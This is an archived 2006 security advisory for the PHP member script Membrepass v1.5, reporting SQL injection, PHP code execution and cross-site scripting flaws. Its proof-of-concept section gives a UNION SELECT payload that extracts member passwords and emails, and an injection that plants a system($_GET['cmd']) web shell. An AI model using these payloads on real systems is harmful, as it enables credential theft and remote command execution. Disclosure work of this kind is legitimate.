AOH :: HP Unsorted M :: B06-4519.HTM

Membrepass v1.5 Php code execution, Xss, Sql Injection



Membrepass v1.5 Php code execution, Xss, Sql Injection
Membrepass v1.5 Php code execution, Xss, Sql Injection



==================================================================0D
 Affected.scr..: Membrepass v1.5=0D
 Advisory.ID...: 09290806=0D
 Type..........: Cross Site Scripting, SQL Injection=0D
                 Php code execution=0D
 Risk.level....: Medium=0D
 Vendor.Status.: Unpatched=0D
 Src.download..: comscripts.com/scripts/php.membrepass.1459.html=0D
 Adv.link......: acid-root.new.fr/advisories/09290806.txt=0D
==================================================================0D
=0D
=0D
==[ OVERVIEW=0D
=============0D
membrepass AVEC MESSAGERIE est un espace membre installation automatique.=0D
Marche sur FREE,ONLINE et les autres h=E9bergeurs.Le script est entierement=0D
configurable et possible d'ajouter les couleurs de votre site.=0D
Vous pouvez ajouter ou supprimer les champs formulaire.=0D
Protection des emails contre aspirateurs (anti SPAM).=0D
[Quote from www.comscripts.com]=0D 
=0D
=0D
==[ DETAILS=0D
============0D
Many vulnerabilities have been discovered in Membrepass v1.5.=0D
=0D
1)Input passed to the "recherche" parameter in /recherchemembre.php isn't=0D
properly sanitised before being used in a SQL query. This bug can be=0D
exploited to conduct SQL injection attacks. Successful exploitation may=0D
require that "magic_quotes_gpc" is disabled.=0D
=0D
2)Input passed to the "aifon" parameter in /include/change.php isn't=0D
properly satanised before being used in fputs() function. This can=0D
be exploited to execude PHP code. Successful exploitation may require=0D
that "register_globals" is enabled and "magic_quotes_gpc" is disabled.=0D
=0D
3)Input passed to the "recherche" parameter in /recherchemembre.php and=0D
to the "email" parameter in /test.php isn't properly satanised before=0D
being returned to the user. This can be exploited to conduct cross-site=0D
scripting attacks. Successful exploitation may require that=0D
"register_globals" is enabled.=0D
=0D
=0D
==[ POC/EXPLOIT=0D
================0D
POST /recherchemembre.php DATA recherche=' UNION SELECT passe,0,email,0,0,0,0,0,0,0,0,0,pseudo,0,0,0,0,0,0,0,0,0 FROM membre #=0D
GET /include/change.php DATA ainfo="; $cmd = $_GET['cmd']; system($cmd); exit; // http://.../include/variable.php?cmd=dir=0D 
POST /recherchemembre.php DATA recherche==0D
GET  /test.php            DATA email==0D
=0D
=0D
==[ SOLUTION=0D
=============0D
Edit the source code to ensure that input is properly verified.=0D
=0D
=0D
==[ TIMELINE=0D
=============0D
29. Aug. 2006 - Public Disclosure=0D
=0D
=0D
==[ CONTACT=0D
============0D
Author: DarkFig=0D
Web...: www.acid-root.new.fr=0D 
E-mail: gmdarkfig[*]gmail[*]com (fr/en)

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.